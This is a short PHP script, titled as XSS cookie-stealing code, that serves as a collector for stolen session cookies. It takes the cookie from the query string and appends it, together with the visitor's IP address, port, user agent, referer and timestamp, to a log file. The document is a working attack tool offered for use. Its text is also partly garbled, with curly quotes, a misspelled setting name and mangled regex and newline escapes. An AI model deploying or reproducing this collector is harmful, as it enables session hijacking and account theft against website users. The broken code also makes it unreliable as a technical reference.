Xss Cookie Stealing Code by Ahmed Raza Memon

1. <?php
2. function GetIP()
3. {
4. if (getenv(“HTTP_CLIENT_IP”) && strcasecmp(getenv(“HTTP_CLIENT_IP”), “unknown”))
5. $ip = getenv(“HTTP_CLIENT_IP”);
6. else if (getenv(“HTTP_X_FORWARDED_FOR”) && strcasecmp(getenv(“HTTP_X_FORWARDED_FOR”), “unknown”))
7. $ip = getenv(“HTTP_X_FORWARDED_FOR”);
8. else if (getenv(“REMOTE_ADDR”) && strcasecmp(getenv(“REMOTE_ADDR”), “unknown”))
9. $ip = getenv(“REMOTE_ADDR”);
10. else if (isset($_SERVER[‘REMOTE_ADDR’]) && $_SERVER[‘REMOTE_ADDR’] && strcasecmp($_SERVER[‘REMOTE_ADDR’], “unknown”))
11. $ip = $_SERVER[‘REMOTE_ADDR’];
12. else
13. $ip = “unknown”;
14. return($ip);
15. }
16. function logData()
17. {
18. $ipLog=”log.txt”;
19. $cookie = $_SERVER[‘QUERY_STRING’];
20. $register_globals = (bool) ini_get(‘register_gobals’);
21. if ($register_globals) $ip = getenv(‘REMOTE_ADDR’);
22. else $ip = GetIP();
23. $rem_port = $_SERVER[‘REMOTE_PORT’];
24. $user_agent = $_SERVER[‘HTTP_USER_AGENT’];
25. $rqst_method = $_SERVER[‘METHOD’];
26. $rem_host = $_SERVER[‘REMOTE_HOST’];
27. $referer = $_SERVER[‘HTTP_REFERER’];
28. $date=date (“l dS of F Y h:i:s A”);
29. $log=fopen(“$ipLog”, “a+”);
30.  
31. if (preg_match(“/bhtmb/i”, $ipLog) || preg_match(“/bhtmlb/i”, $ipLog))
32. fputs($log, “IP: $ip | PORT: $rem_port | HOST: $rem_host | Agent: $user_agent | METHOD: $rqst_method | REF: $referer | DATE{ : } $date | COOKIE: $cookie <br>”);
33. else
34. fputs($log, “IP: $ip | PORT: $rem_port | HOST: $rem_host | Agent: $user_agent | METHOD: $rqst_method | REF: $referer | DATE: $date | COOKIE: $cookie nn”);
35. fclose($log);
36. }
37. logData();
38. ?>